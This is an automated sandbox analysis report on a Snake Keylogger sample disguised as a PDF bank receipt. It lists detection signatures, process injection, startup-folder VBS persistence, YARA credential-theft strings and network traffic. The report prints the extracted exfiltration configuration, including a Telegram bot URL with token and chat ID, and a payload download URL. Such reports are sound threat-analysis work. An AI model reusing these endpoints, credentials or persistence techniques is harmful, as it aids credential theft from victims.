Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont (72).pdf(#U007e56 KB).exe

Overview

General Information

Sample name:e-dekont (72).pdf(#U007e56 KB).exe
renamed because original name is a hash value
Original sample name:e-dekont (72).pdf(~56 KB).exe
Analysis ID:1553407
MD5:d99d18dbd5825f0fddef9063b0afdf9c
SHA1:844a9ea45eec0dc6e5418735dad17fa4c45f589d
SHA256:73e2cbdbd6ebf0c6fa0a287b375b719b3f576287c7950458d6a75f4e293f7655
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • e-dekont (72).pdf(#U007e56 KB).exe (PID: 7088 cmdline: "C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe" MD5: D99D18DBD5825F0FDDEF9063B0AFDF9C)
    • InstallUtil.exe (PID: 1436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6556 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TypeName.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Roaming\TypeName.exe" MD5: D99D18DBD5825F0FDDEF9063B0AFDF9C)
      • InstallUtil.exe (PID: 1476 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA/sendMessage?chat_id=6008123474", "Token": "8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA", "Chat_id": "6008123474", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4475386970.0000000000416000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
  • 0x822:$a1: get_encryptedPassword
  • 0xb0e:$a2: get_encryptedUsername
  • 0x62e:$a3: get_timePasswordChanged
  • 0x729:$a4: get_passwordField
  • 0x838:$a5: set_encryptedPassword
  • 0x1edc:$a7: get_logins
  • 0x1e3f:$a10: KeyLoggerEventArgs
  • 0x1aaa:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
      • 0x19130:$x1: $%SMTPDV$
      • 0x190d8:$x3: %FTPDV$
      • 0x190fc:$m2: Clipboard Logs ID
      • 0x1933a:$m2: Screenshot Logs ID
      • 0x1944a:$m2: keystroke Logs ID
      • 0x19724:$m3: SnakePW
      • 0x19312:$m4: \SnakeKeylogger\
      00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 45 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.e-dekont (72).pdf(#U007e56 KB).exe.6b60000.8.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          4.2.TypeName.exe.411fdb0.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.TypeName.exe.411fdb0.3.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
              4.2.TypeName.exe.411fdb0.3.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x12c22:$a1: get_encryptedPassword
              • 0x12f0e:$a2: get_encryptedUsername
              • 0x12a2e:$a3: get_timePasswordChanged
              • 0x12b29:$a4: get_passwordField
              • 0x12c38:$a5: set_encryptedPassword
              • 0x142dc:$a7: get_logins
              • 0x1423f:$a10: KeyLoggerEventArgs
              • 0x13eaa:$a11: KeyLoggerEventArgsEventHandler
              4.2.TypeName.exe.411fdb0.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x1a63e:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x19870:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x19ca3:$a4: \Orbitum\User Data\Default\Login Data
              • 0x1ace2:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 34 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , ProcessId: 6556, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs" , ProcessId: 6556, ProcessName: wscript.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe, ProcessId: 7088, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T05:17:10.824223+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549721TCP
              2024-11-11T05:17:49.378677+010020229301A Network Trojan was detected52.149.20.212443192.168.2.550009TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T05:16:58.428709+010028033053Unknown Traffic192.168.2.549707188.114.96.3443TCP
              2024-11-11T05:17:01.848385+010028033053Unknown Traffic192.168.2.549711188.114.96.3443TCP
              2024-11-11T05:17:03.078110+010028033053Unknown Traffic192.168.2.549713188.114.96.3443TCP
              2024-11-11T05:17:05.539673+010028033053Unknown Traffic192.168.2.549717188.114.96.3443TCP
              2024-11-11T05:17:11.909969+010028033053Unknown Traffic192.168.2.549730188.114.96.3443TCP
              2024-11-11T05:17:14.709802+010028033053Unknown Traffic192.168.2.549746188.114.96.3443TCP
              2024-11-11T05:17:15.949361+010028033053Unknown Traffic192.168.2.549758188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-11T05:16:56.352623+010028032742Potentially Bad Traffic192.168.2.549705132.226.247.7380TCP
              2024-11-11T05:16:57.930766+010028032742Potentially Bad Traffic192.168.2.549705132.226.247.7380TCP
              2024-11-11T05:16:59.149588+010028032742Potentially Bad Traffic192.168.2.549708132.226.247.7380TCP
              2024-11-11T05:17:01.368274+010028032742Potentially Bad Traffic192.168.2.549710132.226.247.7380TCP
              2024-11-11T05:17:10.149548+010028032742Potentially Bad Traffic192.168.2.549722132.226.247.7380TCP
              2024-11-11T05:17:11.415202+010028032742Potentially Bad Traffic192.168.2.549722132.226.247.7380TCP
              2024-11-11T05:17:12.666977+010028032742Potentially Bad Traffic192.168.2.549731132.226.247.7380TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA/sendMessage?chat_id=6008123474", "Token": "8143251474:AAEA0_EQbWwbg-euvwSvaVk0pmsvD34srnA", "Chat_id": "6008123474", "Version": "5.1"}
              Multi AV Scanner detection for submitted file
              Source: e-dekont (72).pdf(#U007e56 KB).exeVirustotal: Detection: 11%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\TypeName.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: e-dekont (72).pdf(#U007e56 KB).exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49725 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49719 version: TLS 1.2
              Source: e-dekont (72).pdf(#U007e56 KB).exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052769159.0000000006C90000.00000004.08000000.00040000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003F49000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041673043.0000000003306000.00000004.00000800.00020000.00000000.sdmp, e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2181644021.000000000341F000.00000004.00000800.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2052467032.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
              Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 4x nop then jmp 06AD9D2Ah0_2_06AD9B18
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeCode function: 4x nop then jmp 06AD9D2Ah0_2_06AD9B13
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00C5F206h2_2_00C5F017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 00C5FB90h2_2_00C5F017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_00C5E538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05558945h2_2_05558608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05558001h2_2_05557D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05550FF1h2_2_05550D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05557BA9h2_2_05557900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05555441h2_2_05555198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05558459h2_2_055581B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 055572FAh2_2_05557050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 055502E9h2_2_05550040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05550B99h2_2_055508F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05550741h2_2_05550498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05557751h2_2_055574A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05556A21h2_2_05556778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 055565C9h2_2_05556320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05556E79h2_2_05556BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_055533B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_055533A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05555D19h2_2_05555A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 055558C1h2_2_05555618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 05556171h2_2_05555EC8
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4x nop then jmp 06C69D2Ah4_2_06C69B09
              Source: C:\Users\user\AppData\Roaming\TypeName.exeCode function: 4x nop then jmp 06C69D2Ah4_2_06C69B18
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 031EF1F6h6_2_031EF007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 031EFB80h6_2_031EF007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_031EE528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_031EEB5B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_031EED3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D08945h6_2_06D08608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D06171h6_2_06D05EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_06D036CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D05D19h6_2_06D05A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D058C1h6_2_06D05618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D06E79h6_2_06D06BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_06D033B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_06D033A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D06A21h6_2_06D06778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D065C9h6_2_06D06320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D00B99h6_2_06D008F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D00741h6_2_06D00498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D07751h6_2_06D074A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D072FAh6_2_06D07050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D002E9h6_2_06D00040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D05441h6_2_06D05198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D08459h6_2_06D081B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D08001h6_2_06D07D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D00FF1h6_2_06D00D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 4x nop then jmp 06D07BA9h6_2_06D07900

              Networking

              barindex
              Yara detected Generic Downloader
              Source: Yara matchFile source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
              Source: global trafficHTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /slim/Tvifaznhqk.mp4 HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/66.23.206.109 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
              Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownDNS query: name: checkip.dyndns.org
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 132.226.247.73:80
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49707 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49713 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49730 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49758 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49746 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49721
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:50009
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
